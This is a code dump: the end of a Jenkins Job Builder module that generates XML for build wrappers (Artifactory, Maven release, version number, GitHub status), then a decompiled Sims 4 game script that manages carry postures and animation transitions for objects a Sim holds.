data.get('env-vars-include', False)).lower()
XML.SubElement(artifactory, 'discardOldBuilds').text = str(
data.get('discard-old-builds', False)).lower()
XML.SubElement(artifactory, 'discardBuildArtifacts').text = str(
data.get('discard-build-artifacts', True)).lower()
# envVarsPatterns
artifactory_env_vars_patterns(artifactory, data)
def artifactory_maven_freestyle(registry, xml_parent, data):
"""yaml: artifactory-maven-freestyle
Wrapper for Free Stype projects. Requires the Artifactory plugin.
Requires :jenkins-wiki:`Artifactory Plugin <Artifactory+Plugin>`
:arg str url: URL of the Artifactory server. e.g.
https://www.jfrog.com/artifactory/ (default '')
:arg str name: Artifactory user with permissions use for
connected to the selected Artifactory Server (default '')
:arg str release-repo-key: Release repository name (default '')
:arg str snapshot-repo-key: Snapshots repository name (default '')
:arg bool publish-build-info: Push build metadata with artifacts
(default false)
:arg bool discard-old-builds:
Remove older build info from Artifactory (default true)
:arg bool discard-build-artifacts:
Remove older build artifacts from Artifactory (default false)
:arg bool include-env-vars: Include all environment variables
accessible by the build process. Jenkins-specific env variables
are always included (default false)
:arg bool run-checks: Run automatic license scanning check after the
build is complete (default false)
:arg bool include-publish-artifacts: Include the build's published
module artifacts in the license violation checks if they are
also used as dependencies for other modules in this build
(default false)
:arg bool license-auto-discovery: Tells Artifactory not to try
and automatically analyze and tag the build's dependencies
with license information upon deployment (default true)
:arg bool enable-issue-tracker-integration: When the Jenkins
JIRA plugin is enabled, synchronize information about JIRA
issues to Artifactory and attach issue information to build
artifacts (default false)
:arg bool aggregate-build-issues: When the Jenkins JIRA plugin
is enabled, include all issues from previous builds up to the
latest build status defined in "Aggregation Build Status"
(default false)
:arg bool filter-excluded-artifacts-from-build: Add the excluded
files to the excludedArtifacts list and remove them from the
artifacts list in the build info (default false)
:arg str scopes: A list of dependency scopes/configurations to run
license violation checks on. If left empty all dependencies from
all scopes will be checked (default '')
:arg str violation-recipients: Recipients that need to be notified
of license violations in the build info (default '')
:arg list matrix-params: List of properties to attach to all
deployed artifacts in addition to the default ones:
build.name, build.number, and vcs.revision (default '')
:arg str black-duck-app-name: The existing Black Duck Code Center
application name (default '')
:arg str black-duck-app-version: The existing Black Duck Code Center
application version (default '')
:arg str black-duck-report-recipients: Recipients that will be emailed
a report after the automatic Black Duck Code Center compliance checks
finished (default '')
:arg str black-duck-scopes: A list of dependency scopes/configurations
to run Black Duck Code Center compliance checks on. If left empty
all dependencies from all scopes will be checked (default '')
:arg bool black-duck-run-checks: Automatic Black Duck Code Center
compliance checks will occur after the build completes
(default false)
:arg bool black-duck-include-published-artifacts: Include the build's
published module artifacts in the license violation checks if they
are also used as dependencies for other modules in this build
(default false)
:arg bool auto-create-missing-component-requests: Auto create
missing components in Black Duck Code Center application after
the build is completed and deployed in Artifactory
(default true)
:arg bool auto-discard-stale-component-requests: Auto discard
stale components in Black Duck Code Center application after
the build is completed and deployed in Artifactory
(default true)
:arg bool deploy-artifacts: Push artifacts to the Artifactory
Server. The specific artifacts to push are controlled using
the deployment-include-patterns and deployment-exclude-patterns.
(default true)
:arg list deployment-include-patterns: List of patterns for including
build artifacts to publish to artifactory. (default[]')
:arg list deployment-exclude-patterns: List of patterns
for excluding artifacts from deployment to Artifactory
(default [])
:arg bool env-vars-include: Include environment variables
accessible by the build process. Jenkins-specific env variables
are always included. Environment variables can be filtered using
the env-vars-include-patterns nad env-vars-exclude-patterns.
(default false)
:arg list env-vars-include-patterns: List of environment variable patterns
that will be included as part of the published build info. Environment
variables may contain the * and the ? wildcards (default [])
:arg list env-vars-exclude-patterns: List of environment variable patterns
that will be excluded from the published build info
(default [])
Example:
.. literalinclude:: /../../tests/wrappers/fixtures/artifactory003.yaml
:language: yaml
"""
artifactory = XML.SubElement(
xml_parent,
'org.jfrog.hudson.maven3.ArtifactoryMaven3Configurator')
# details
details = XML.SubElement(artifactory, 'details')
artifactory_common_details(details, data)
deploy_release = XML.SubElement(details, 'deployReleaseRepository')
artifactory_repository(deploy_release, data, 'release')
deploy_snapshot = XML.SubElement(details, 'deploySnapshotRepository')
artifactory_repository(deploy_snapshot, data, 'snapshot')
XML.SubElement(details, 'stagingPlugin').text = data.get(
'resolve-staging-plugin', '')
# resolverDetails
resolver = XML.SubElement(artifactory, 'resolverDetails')
artifactory_common_details(resolver, data)
resolve_snapshot = XML.SubElement(resolver, 'resolveSnapshotRepository')
artifactory_repository(resolve_snapshot, data, 'snapshot')
deploy_release = XML.SubElement(resolver, 'resolveReleaseRepository')
artifactory_repository(deploy_release, data, 'release')
XML.SubElement(resolver, 'stagingPlugin').text = data.get(
'resolve-staging-plugin', '')
# artifactDeploymentPatterns
artifactory_deployment_patterns(artifactory, data)
# envVarsPatterns
artifactory_env_vars_patterns(artifactory, data)
XML.SubElement(artifactory, 'matrixParams').text = ','.join(
data.get('matrix-params', []))
# optional__props
artifactory_optional_props(artifactory, data, 'wrappers')
def maven_release(registry, xml_parent, data):
"""yaml: maven-release
Wrapper for Maven projects
Requires :jenkins-wiki:`M2 Release Plugin <M2+Release+Plugin>`
:arg str release-goals: Release goals and options (default '')
:arg str dry-run-goals: DryRun goals and options (default '')
:arg int num-successful-builds: Number of successful release builds to keep
(default 1)
:arg bool select-custom-scm-comment-prefix: Preselect 'Specify custom SCM
comment prefix' (default false)
:arg bool select-append-jenkins-username: Preselect 'Append Jenkins
Username' (default false)
:arg bool select-scm-credentials: Preselect 'Specify SCM login/password'
(default false)
:arg str release-env-var: Release environment variable (default '')
:arg str scm-user-env-var: SCM username environment variable (default '')
:arg str scm-password-env-var: SCM password environment variable
(default '')
Example:
.. literalinclude:: /../../tests/wrappers/fixtures/maven-release001.yaml
:language: yaml
"""
mvn_release = XML.SubElement(xml_parent,
'org.jvnet.hudson.plugins.m2release.'
'M2ReleaseBuildWrapper')
mapping = [
('release-goals', 'releaseGoals', ''),
('dry-run-goals', 'dryRunGoals', ''),
('num-successful-builds', 'numberOfReleaseBuildsToKeep', 1),
('select-custom-scm-comment-prefix', 'selectCustomScmCommentPrefix',
False),
('select-append-jenkins-username', 'selectAppendHudsonUsername',
False),
('select-scm-credentials', 'selectScmCredentials', False),
('release-env-var', 'releaseEnvVar', ''),
('scm-user-env-var', 'scmUserEnvVar', ''),
('scm-password-env-var', 'scmPasswordEnvVar', ''),
]
convert_mapping_to_xml(mvn_release, data, mapping, fail_required=True)
def version_number(parser, xml_parent, data):
"""yaml: version-number
Generate a version number for the build using a format string. See the
wiki page for more detailed descriptions of options.
Requires the Jenkins :jenkins-wiki:`version number plugin
<Version+Number+Plugin>`.
:arg str variable-name: Name of environment variable to assign version
number to (required)
:arg str format-string: Format string used to generate version number
(required)
:arg str prefix-variable: Variable that contains version number prefix
(optional)
:arg bool skip-failed-builds: If the build fails, DO NOT increment any
auto-incrementing component of the version number (default: false)
:arg bool display-name: Use the version number for the build display
name (default: false)
:arg str start-date: The date the project began as a UTC timestamp
(default 1970-1-1 00:00:00.0 UTC)
:arg int builds-today: The number of builds that have been executed
today (optional)
:arg int builds-this-month: The number of builds that have been executed
since the start of the month (optional)
:arg int builds-this-year: The number of builds that have been executed
since the start of the year (optional)
:arg int builds-all-time: The number of builds that have been executed
since the start of the project (optional)
Example:
.. literalinclude:: /../../tests/wrappers/fixtures/version-number001.yaml
:language: yaml
"""
version_number = XML.SubElement(
xml_parent, 'org.jvnet.hudson.tools.versionnumber.VersionNumberBuilder'
)
mapping = [
# option, xml name, default value
("variable-name", 'environmentVariableName', None),
("format-string", 'versionNumberString', None),
("prefix-variable", 'environmentPrefixVariable', ''),
("skip-failed-builds", 'skipFailedBuilds', False),
("display-name", 'useAsBuildDisplayName', False),
("start-date", 'projectStartDate', '1970-1-1 00:00:00.0 UTC'),
("builds-today", 'oBuildsToday', '-1'),
("builds-this-month", 'oBuildsThisMonth', '-1'),
("builds-this-year", 'oBuildsThisYear', '-1'),
("builds-all-time", 'oBuildsAllTime', '-1'),
]
convert_mapping_to_xml(version_number, data, mapping, fail_required=True)
def github_pull_request(parser, xml_parent, data):
"""yaml: github-pull-request
Set GitHub commit status with custom context and message.
Requires the Jenkins :jenkins-wiki:`GitHub Pull Request Builder Plugin
<GitHub+pull+request+builder+plugin>`.
:arg bool show-matrix-status: Only post commit status of parent matrix job
(default false)
:arg str status-context: The context to include on PR status comments
(default '')
:arg str triggered-status: The status message to set when the build has
been triggered (default '')
:arg str started-status: The status message to set when the build has
been started (default '')
:arg str status-url: The status URL to set (default '')
:arg bool status-add-test-results: Add test result one-liner to status
message (default false)
:arg list statuses: List of custom statuses on the commit for when a build
is completed
:Status:
* **message** (`str`) -- The message that is appended to a comment
when a build finishes with the desired build status. If no status
updates should be made when a build finishes with the indicated
build status, use "--none--" to alert the trigger. (required)
* **result** (`str`) -- Build result. Can be one of 'SUCCESS',
'ERROR' or 'FAILURE'. (required)
Minimal Example:
.. literalinclude::
/../../tests/wrappers/fixtures/github-pull-request-minimal.yaml
:language: yaml
Full Example:
.. literalinclude::
/../../tests/wrappers/fixtures/github-pull-request-full.yaml
:language: yaml
"""
ghprb = XML.SubElement(
xml_parent, 'org.jenkinsci.plugins.ghprb.upstream.GhprbUpstreamStatus'
)
mapping = [
# option, xml name, default value
("show-matrix-status", 'showMatrixStatus', False),
("status-context", 'commitStatusContext', ''),
("triggered-status", 'triggeredStatus', ''),
("started-status", 'startedStatus', ''),
("status-url", 'statusUrl', ''),
("status-add-test-results", 'addTestResults', False)
]
convert_mapping_to_xml(ghprb, data, mapping, fail_required=True)
statuses = data.get('statuses', [])
if statuses:
status_mapping = [
('message', 'message', None),
('result', 'result', ''),
]
result_list = ['ERROR', 'SUCCESS', 'FAILURE']
completed_tag = XML.SubElement(ghprb, 'completedStatus')
for status in statuses:
result = status.get('result', '')
if result not in result_list:
raise JenkinsJobsException(
"'result' must be one of: " + ', '.join(result_list))
result_tag = XML.SubElement(
completed_tag,
'org.jenkinsci.plugins.ghprb.extensions'
'.comments.GhprbBuildResultMessage'
)
convert_mapping_to_xml(
result_tag, status, status_mapping, fail_required=True)
class Wrappers(jenkins_jobs.modules.base.Base):
sequence = 80
component_type = 'wrapper'
component_list_type = 'wrappers'
def gen_xml(self, xml_parent, data):
wrappers = XML.SubElement(xml_parent, 'buildWrappers')
for wrap in data.get('wrappers', []):
self.registry.dispatch('wrapper', wrappers, wrap)
| 39.863289 | 80 | 0.635183 |
acf6c217dfb5369e9562fd3b99949739b7a875ab | 30,429 | py | Python | Scripts/simulation/carry/carry_elements.py | velocist/TS4CheatsInfo | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | [
"Apache-2.0"
] | null | null | null | Scripts/simulation/carry/carry_elements.py | velocist/TS4CheatsInfo | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | [
"Apache-2.0"
] | null | null | null | Scripts/simulation/carry/carry_elements.py | velocist/TS4CheatsInfo | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | [
"Apache-2.0"
] | null | null | null | # uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: T:\InGame\Gameplay\Scripts\Server\carry\carry_elements.py
# Compiled at: 2018-05-18 03:28:16
# Size of source mod 2**32: 44951 bytes
import functools
from animation import ClipEventType
from animation.animation_utils import flush_all_animations, disable_asm_auto_exit
from animation.arb import Arb
from animation.arb_element import distribute_arb_element
from carry.carry_tuning import CarryPostureStaticTuning
from carry.carry_utils import hand_to_track, track_to_hand, SCRIPT_EVENT_ID_START_CARRY, SCRIPT_EVENT_ID_STOP_CARRY
from element_utils import build_element, build_critical_section, must_run, build_critical_section_with_finally
from interactions import ParticipantType, ParticipantTypeSingleSim
from interactions.aop import AffordanceObjectPair
from interactions.context import QueueInsertStrategy, InteractionContext
from postures import PostureTrack
from postures.context import PostureContext
from postures.posture_specs import PostureSpecVariable, PostureOperation, PostureAspectBody, PostureAspectSurface, SURFACE_TARGET_INDEX, SURFACE_SLOT_TYPE_INDEX, SURFACE_INDEX
from postures.transition import PostureTransition
from sims4.log import StackVar
from sims4.tuning.tunable import HasTunableFactory, AutoFactoryInit, HasTunableSingletonFactory, TunableEnumEntry, TunableVariant, TunableFactory, TunableTuple, TunablePackSafeReference
from singletons import DEFAULT
import element_utils, elements, services, sims4.log, sims4.resources
from postures.posture_state import PostureState
logger = sims4.log.Logger('Carry', default_owner='rmccord')
def _create_enter_carry_posture(sim, posture_state, carry_target, track):
var_map = {PostureSpecVariable.CARRY_TARGET: carry_target,
PostureSpecVariable.HAND: track_to_hand(track),
PostureSpecVariable.POSTURE_TYPE_CARRY_OBJECT: carry_target.get_carry_object_posture()}
pick_up_operation = PostureOperation.PickUpObject(PostureSpecVariable.POSTURE_TYPE_CARRY_OBJECT, PostureSpecVariable.CARRY_TARGET)
new_source_aop = pick_up_operation.associated_aop(sim, var_map)
new_posture_spec = pick_up_operation.apply((posture_state.get_posture_spec(var_map)), enter_carry_while_holding=True)
if new_posture_spec is None:
raise RuntimeError('[rmccord] Failed to create new_posture_spec in enter_carry_while_holding!')
new_posture_state = PostureState(sim, posture_state, new_posture_spec, var_map)
new_posture = new_posture_state.get_aspect(track)
from carry.carry_postures import CarryingNothing
if new_posture is None or isinstance(new_posture, CarryingNothing):
raise RuntimeError('[rmccord] Failed to create a valid new_posture ({}) from new_posture_state ({}) in enter_carry_while_holding!'.format(new_posture, new_posture_state))
new_posture.external_transition = True
return (
new_posture_state, new_posture, new_source_aop, var_map)
def enter_carry_while_holding(si, obj=None, carry_obj_participant_type=None, callback=None, create_si_fn=DEFAULT, sim_participant_type=ParticipantType.Actor, target_participant_type=None, owning_affordance=DEFAULT, carry_track_override=None, sequence=None, carry_sim=DEFAULT, track=DEFAULT, asm_context=None, priority_override=None, target_override=None):
sim = si.get_participant(sim_participant_type) if carry_sim is DEFAULT else carry_sim
if target_override is None:
target = si.get_participant(target_participant_type) if target_participant_type is not None else None
else:
target = target_override
context = si.context.clone_for_sim(sim, insert_strategy=(QueueInsertStrategy.NEXT))
if priority_override is not None:
context.priority = priority_override
if carry_track_override is not None:
track = carry_track_override
if track is DEFAULT:
track = si.carry_track
if track is None:
raise RuntimeError("[rmccord] enter_carry_while_holding: Interaction {} does not have a carry_track, which means its animation tuning doesn't have a carry target or create target specified in object editor or the posture manifest from the swing graph does not require a specific object. {}".format(si, StackVar(('process',
'_auto_constraints'))))
if create_si_fn is DEFAULT:
if owning_affordance is None:
create_si_fn = None
if create_si_fn is DEFAULT:
if owning_affordance is DEFAULT:
raise AssertionError("[rmccord] No create_si_fn was provided and we don't know how to make one.")
def create_si_fn():
context.carry_target = obj
aop = AffordanceObjectPair(owning_affordance, target, owning_affordance, None)
return (aop, context)
def set_up_transition_gen(timeline):
nonlocal obj
nonlocal sequence
if carry_obj_participant_type is not None:
obj = si.get_participant(carry_obj_participant_type)
if obj is None:
raise ValueError('[rmccord] Attempt to perform an enter carry while holding with None as the carried object. SI: {}'.format(si))
else:
new_posture_state, new_posture, new_source_aop, var_map = _create_enter_carry_posture(sim, sim.posture_state, obj, track)
if obj.is_sim:
target_posture_state = new_posture.set_target_linked_posture_data()
else:
target_posture_state = None
got_callback = False
def event_handler_enter_carry(event_data):
nonlocal got_callback
if got_callback:
logger.warn('Animation({}) calling to start a carry multiple times', event_data.event_data.get('clip_name'))
return
got_callback = True
arb = Arb()
locked_params = new_posture.get_locked_params(None)
old_carry_posture = sim.posture_state.get_aspect(track)
if old_carry_posture is not None:
old_carry_posture.append_exit_to_arb(arb, new_posture_state, new_posture, var_map)
new_posture.append_transition_to_arb(arb, old_carry_posture, locked_params=locked_params,
in_xevt_handler=True)
distribute_arb_element(arb)
if asm_context is not None:
asm_context.register_event_handler(event_handler_enter_carry, handler_type=(ClipEventType.Script), handler_id=SCRIPT_EVENT_ID_START_CARRY, tag='enter_carry')
else:
si.store_event_handler(event_handler_enter_carry, handler_id=SCRIPT_EVENT_ID_START_CARRY)
def maybe_do_transition_gen(timeline):
def push_si_gen(timeline):
context = InteractionContext(sim, (InteractionContext.SOURCE_POSTURE_GRAPH), (si.priority if priority_override is None else priority_override),
run_priority=(si.run_priority if priority_override is None else priority_override),
insert_strategy=(QueueInsertStrategy.FIRST),
must_run_next=True,
group_id=(si.group_id))
result = new_source_aop.interaction_factory(context)
if not result:
return result
source_interaction = result.interaction
new_posture.source_interaction = source_interaction
owning_interaction = None
if create_si_fn is not None:
aop, context = create_si_fn()
if aop is not None:
if context is not None:
if aop.test(context):
result = aop.interaction_factory(context)
if result:
owning_interaction = result.interaction
if owning_interaction is None:
si.acquire_posture_ownership(new_posture)
yield from source_interaction.run_direct_gen(timeline)
else:
owning_interaction.acquire_posture_ownership(new_posture)
aop.execute_interaction(owning_interaction)
new_source_aop.execute_interaction(source_interaction)
if target_posture_state is not None:
yield from new_posture.kickstart_linked_carried_posture_gen(timeline)
return result
if False:
yield None
def call_callback(_):
if callback is not None:
callback(new_posture, new_posture.source_interaction)
if got_callback:
if target_posture_state is not None:
obj.posture_state = target_posture_state
result = yield from element_utils.run_child(timeline, must_run([
PostureTransition(new_posture, new_posture_state, context, var_map), push_si_gen, call_callback]))
return result
return True
if False:
yield None
sequence = disable_asm_auto_exit(sim, sequence)
with si.cancel_deferred((si,)):
yield from element_utils.run_child(timeline, must_run(build_critical_section(build_critical_section(sequence, flush_all_animations), maybe_do_transition_gen)))
if False:
yield None
return build_element(set_up_transition_gen)
def _create_exit_carry_posture(sim, target, interaction, use_posture_animations, preserve_posture=None):
failure_result = (None, None, None, None, None)
slot_manifest = interaction.slot_manifest
old_carry_posture = sim.posture_state.get_carry_posture(target)
if old_carry_posture is None:
return failure_result
spec_surface = sim.posture_state.spec[SURFACE_INDEX]
has_slot_surface = spec_surface is not None and spec_surface[SURFACE_SLOT_TYPE_INDEX] is not None
if not target.transient:
if has_slot_surface:
put_down_operation = PostureOperation.PutDownObjectOnSurface(PostureSpecVariable.POSTURE_TYPE_CARRY_NOTHING, spec_surface[SURFACE_TARGET_INDEX], spec_surface[SURFACE_SLOT_TYPE_INDEX], PostureSpecVariable.CARRY_TARGET)
else:
put_down_operation = PostureOperation.PutDownObject(PostureSpecVariable.POSTURE_TYPE_CARRY_NOTHING, PostureSpecVariable.CARRY_TARGET)
var_map = {PostureSpecVariable.CARRY_TARGET: target,
PostureSpecVariable.HAND: track_to_hand(old_carry_posture.track),
PostureSpecVariable.POSTURE_TYPE_CARRY_NOTHING: CarryPostureStaticTuning.POSTURE_CARRY_NOTHING,
PostureSpecVariable.SLOT: slot_manifest,
PostureSpecVariable.SLOT_TEST_DEFINITION: interaction.create_target}
current_spec = sim.posture_state.get_posture_spec(var_map)
if current_spec is None:
if preserve_posture is None:
logger.warn('Failed to get posture spec for var_map: {} for {}', sim.posture_state, var_map)
return failure_result
new_posture_spec = put_down_operation.apply(current_spec)
if new_posture_spec is None:
if preserve_posture is None:
logger.warn('Failed to apply put_down_operation: {}', put_down_operation)
return failure_result
if not new_posture_spec.validate_destination((new_posture_spec,), var_map, interaction.affordance, sim):
if preserve_posture is None:
logger.warn('Failed to validate put down spec {} with var map {}', new_posture_spec, var_map)
return failure_result
carry_posture_overrides = {}
if preserve_posture is not None:
carry_posture_overrides[preserve_posture.track] = preserve_posture
new_posture_state = PostureState(sim, (sim.posture_state), new_posture_spec, var_map, carry_posture_overrides=carry_posture_overrides)
new_posture = new_posture_state.get_aspect(old_carry_posture.track)
new_posture.source_interaction = interaction.super_interaction
new_posture.external_transition = not use_posture_animations
posture_context = PostureContext(interaction.context.source, interaction.priority, None)
transition = PostureTransition(new_posture, new_posture_state, posture_context, var_map, locked_params=(interaction.locked_params))
transition.must_run = True
return (
old_carry_posture, new_posture, new_posture_state, transition, var_map)
def exit_carry_while_holding(interaction, callback=None, sequence=None, sim_participant_type=ParticipantType.Actor, use_posture_animations=False, carry_system_target=None, target=DEFAULT, arb=None):
si = interaction.super_interaction
sim = interaction.get_participant(sim_participant_type)
target = interaction.carry_target or interaction.target if target is DEFAULT else target
def set_up_transition_gen(timeline):
old_carry_posture, new_posture, _, transition, var_map = _create_exit_carry_posture(sim, target, interaction, use_posture_animations)
if transition is None:
yield from element_utils.run_child(timeline, sequence)
return
elif arb is None:
register_event = functools.partial((interaction.store_event_handler), handler_id=SCRIPT_EVENT_ID_STOP_CARRY)
else:
register_event = functools.partial((arb.register_event_handler), handler_id=SCRIPT_EVENT_ID_STOP_CARRY)
exited_carry = False
if not use_posture_animations:
def event_handler_exit_carry(event_data):
nonlocal exited_carry
exited_carry = True
arb = Arb()
old_carry_posture.append_exit_to_arb(arb, None, new_posture, var_map, exit_while_holding=True)
new_posture.append_transition_to_arb(arb, old_carry_posture, in_xevt_handler=True)
distribute_arb_element(arb, master=sim)
register_event(event_handler_exit_carry)
if callback is not None:
register_event(callback)
def maybe_do_transition(timeline):
nonlocal transition
_, _, _, new_transition, _ = _create_exit_carry_posture(sim, target, interaction, use_posture_animations, preserve_posture=new_posture)
if new_transition is not None:
transition = new_transition
if not use_posture_animations:
if not exited_carry:
event_handler_exit_carry(None)
if callback is not None:
callback()
if use_posture_animations or exited_carry:
interaction_target_was_target = False
si_target_was_target = False
if old_carry_posture.target_is_transient:
if interaction.target == target:
interaction_target_was_target = True
interaction.set_target(None)
if si.target == target:
si_target_was_target = True
si.set_target(None)
if carry_system_target is not None:
old_carry_posture.carry_system_target = carry_system_target
def do_transition(timeline):
result = yield from element_utils.run_child(timeline, transition)
if result:
if target.is_sim:
body_posture_type = sim.posture_state.spec.body.posture_type
if not body_posture_type.multi_sim:
post_transition_spec = sim.posture_state.spec.clone(body=(PostureAspectBody((body_posture_type, None))),
surface=(PostureAspectSurface((None, None, None))))
post_posture_state = PostureState(sim, sim.posture_state, post_transition_spec, var_map)
post_posture_state.body.source_interaction = sim.posture.source_interaction
post_transition = PostureTransition(post_posture_state.body, post_posture_state, sim.posture.posture_context, var_map)
post_transition.must_run = True
yield from element_utils.run_child(timeline, post_transition)
interaction_target_was_target = False
si_target_was_target = False
new_posture.source_interaction = None
return True
return False
if False:
yield None
def post_transition(_):
if interaction_target_was_target:
interaction.set_target(target)
if si_target_was_target:
si.set_target(target)
if carry_system_target is not None:
old_carry_posture.carry_system_target = None
yield from element_utils.run_child(timeline, must_run(build_critical_section_with_finally(do_transition, post_transition)))
if False:
yield None
new_sequence = disable_asm_auto_exit(sim, sequence)
yield from element_utils.run_child(timeline, build_critical_section(build_critical_section(new_sequence, flush_all_animations), maybe_do_transition))
if False:
yield None
return build_element(set_up_transition_gen)
def swap_carry_while_holding(interaction, original_carry_target, new_carry_object, callback=None, sequence=None, sim_participant_type=ParticipantType.Actor, carry_system_target=None):
si = interaction.super_interaction
sim = interaction.get_participant(sim_participant_type)
def set_up_transition(timeline):
original_carry_posture, carry_nothing_posture, carry_nothing_posture_state, transition_to_carry_nothing, carry_nothing_var_map = _create_exit_carry_posture(sim, original_carry_target, interaction, False)
if transition_to_carry_nothing is None:
return False
final_posture_state, final_posture, final_source_aop, final_var_map = _create_enter_carry_posture(sim, carry_nothing_posture_state, new_carry_object, original_carry_posture.track)
got_callback = False
def event_handler_swap_carry(event_data):
nonlocal got_callback
if got_callback:
logger.warn('Animation({}) calling to start a carry multiple times', event_data.event_data.get('clip_name'))
return
got_callback = True
arb_exit = Arb()
original_carry_posture.append_exit_to_arb(arb_exit, None, carry_nothing_posture, carry_nothing_var_map, exit_while_holding=True)
carry_nothing_posture.append_transition_to_arb(arb_exit, original_carry_posture, in_xevt_handler=True)
distribute_arb_element(arb_exit)
original_carry_posture.target.transient = True
original_carry_posture.target.clear_parent(sim.transform, sim.routing_surface)
original_carry_posture.target.remove_from_client()
arb_enter = Arb()
locked_params = final_posture.get_locked_params(None)
if carry_nothing_posture is not None:
carry_nothing_posture.append_exit_to_arb(arb_enter, final_posture_state, final_posture, final_var_map)
final_posture.append_transition_to_arb(arb_enter, carry_nothing_posture, locked_params=locked_params,
in_xevt_handler=True)
distribute_arb_element(arb_enter)
interaction.store_event_handler(event_handler_swap_carry, handler_id=SCRIPT_EVENT_ID_START_CARRY)
if callback is not None:
interaction.store_event_handler(callback, handler_id=SCRIPT_EVENT_ID_START_CARRY)
def maybe_do_transition(timeline):
def push_si(_):
context = InteractionContext(sim, (InteractionContext.SOURCE_POSTURE_GRAPH),
(si.priority),
run_priority=(si.run_priority),
insert_strategy=(QueueInsertStrategy.NEXT),
must_run_next=True,
group_id=(si.group_id))
result = final_source_aop.interaction_factory(context)
if not result:
return result
final_source_interaction = result.interaction
si.acquire_posture_ownership(final_posture)
yield from final_source_interaction.run_direct_gen(timeline)
final_posture.source_interaction = final_source_interaction
return result
if False:
yield None
if not got_callback:
event_handler_swap_carry(None)
if callback is not None:
callback()
if got_callback:
if original_carry_posture.target_is_transient:
if interaction.target == original_carry_target:
interaction_target_was_target = True
interaction.set_target(None)
else:
interaction_target_was_target = False
if si.target == original_carry_target:
si_target_was_target = True
si.set_target(None)
else:
si_target_was_target = False
else:
interaction_target_was_target = False
si_target_was_target = False
if carry_system_target is not None:
original_carry_posture.carry_system_target = carry_system_target
def do_transition(timeline):
nonlocal interaction_target_was_target
nonlocal si_target_was_target
result = yield from element_utils.run_child(timeline, transition_to_carry_nothing)
if not result:
return False
interaction_target_was_target = False
si_target_was_target = False
carry_nothing_posture.source_interaction = None
return True
if False:
yield None
def post_transition(_):
if interaction_target_was_target:
interaction.set_target(original_carry_target)
if si_target_was_target:
si.set_target(original_carry_target)
if carry_system_target is not None:
original_carry_posture.carry_system_target = None
exit_carry_result = yield from element_utils.run_child(timeline, must_run(build_critical_section_with_finally(do_transition, post_transition)))
if not exit_carry_result:
raise RuntimeError('[maxr] Failed to exit carry: {}'.format(original_carry_posture))
if got_callback:
context = si.context.clone_for_sim(sim)
yield from element_utils.run_child(timeline, (
PostureTransition(final_posture, final_posture_state, context, final_var_map), push_si))
if False:
yield None
new_sequence = disable_asm_auto_exit(sim, sequence)
yield from element_utils.run_child(timeline, build_critical_section(build_critical_section(new_sequence, flush_all_animations), maybe_do_transition))
if False:
yield None
return (
set_up_transition,)
class EnterCarryWhileHolding(elements.ParentElement, HasTunableFactory, AutoFactoryInit):
class TrackOverrideExplicit(HasTunableSingletonFactory, AutoFactoryInit):
FACTORY_TUNABLES = {'carry_track': TunableEnumEntry(description='\n Which hand to carry the object in.\n ',
tunable_type=PostureTrack,
default=(PostureTrack.RIGHT),
invalid_enums=(
PostureTrack.BODY,))}
def get_override(self, *args, **kwargs):
return self.carry_track
class TrackOverrideHandedness(HasTunableSingletonFactory, AutoFactoryInit):
def get_override(self, interaction, sim_participant, *args, **kwargs):
carry_participant = interaction.get_participant(sim_participant)
if carry_participant is None:
return
hand = carry_participant.get_preferred_hand()
return hand_to_track(hand)
NONE = 1
OBJECT_TO_BE_CARRIED = 2
PARTICIPANT_TYPE = 3
FACTORY_TUNABLES = {'carry_obj_participant_type':TunableEnumEntry(description='\n The object that will be carried.\n ',
tunable_type=ParticipantType,
default=ParticipantType.CarriedObject),
'sim_participant_type':TunableEnumEntry(description='\n The Sim that will get a new carry.\n ',
tunable_type=ParticipantTypeSingleSim,
default=ParticipantTypeSingleSim.Actor),
'target':TunableVariant(description='\n Specify what to use as the target of\n the owning affordance.\n ',
object_to_be_carried=TunableTuple(description='\n Target is the object that WILL be carried.\n ',
locked_args={'target_type': OBJECT_TO_BE_CARRIED}),
none=TunableTuple(description='\n Target is None\n ',
locked_args={'target_type': NONE}),
participant_type=TunableTuple(description='\n Target is the specified participant of THIS interaction.\n \n This is necessary if we need to target another participant\n when we push the owning affordance\n ',
participant=TunableEnumEntry(tunable_type=ParticipantType,
default=(ParticipantType.CarriedObject)),
locked_args={'target_type': PARTICIPANT_TYPE}),
default='object_to_be_carried'),
'owning_affordance':TunablePackSafeReference(description='\n The interaction that will be pushed that will own the carry\n state (e.g. a put down).\n ',
manager=services.get_instance_manager(sims4.resources.Types.INTERACTION),
allow_none=True),
'carry_track_override':TunableVariant(description='\n Specify the carry track, instead of using the carry of the SI.\n ',
explicit=TrackOverrideExplicit.TunableFactory(),
handedness=TrackOverrideHandedness.TunableFactory(),
default='disabled',
locked_args={'disabled': None})}
def __init__(self, interaction, *args, sequence=(), **kwargs):
(super().__init__)(*args, **kwargs)
self.interaction = interaction
self.sequence = sequence
def _run(self, timeline):
carry_track_override = self.carry_track_override.get_override(self.interaction, self.sim_participant_type) if self.carry_track_override is not None else None
target = self.target
if target.target_type == EnterCarryWhileHolding.NONE:
target_participant_type = None
else:
if target.target_type == EnterCarryWhileHolding.OBJECT_TO_BE_CARRIED:
target_participant_type = self.carry_obj_participant_type
else:
if target.target_type == EnterCarryWhileHolding.PARTICIPANT_TYPE:
target_participant_type = target.participant
carry_element = enter_carry_while_holding((self.interaction), sequence=(self.sequence),
carry_obj_participant_type=(self.carry_obj_participant_type),
sim_participant_type=(self.sim_participant_type),
target_participant_type=target_participant_type,
owning_affordance=(self.owning_affordance),
carry_track_override=carry_track_override)
return timeline.run_child(carry_element)
class TunableExitCarryWhileHolding(TunableFactory):
FACTORY_TYPE = staticmethod(exit_carry_while_holding)
def __init__(self, *args, description='Exit the carry for the target or carry_target of an interaction. The animations played during the interaction should exit the carry via an XEVT.', **kwargs):
(super().__init__)(args, description=description, sim_participant_type=TunableEnumEntry(description='\n The Sim that will exit a carry.\n ',
tunable_type=ParticipantType,
default=(ParticipantType.Actor)), **kwargs)
class TransferCarryWhileHolding(elements.ParentElement, HasTunableFactory, AutoFactoryInit):
FACTORY_TUNABLES = {'enter_carry_while_holding':EnterCarryWhileHolding.TunableFactory(),
'exit_carry_while_holding':TunableExitCarryWhileHolding()}
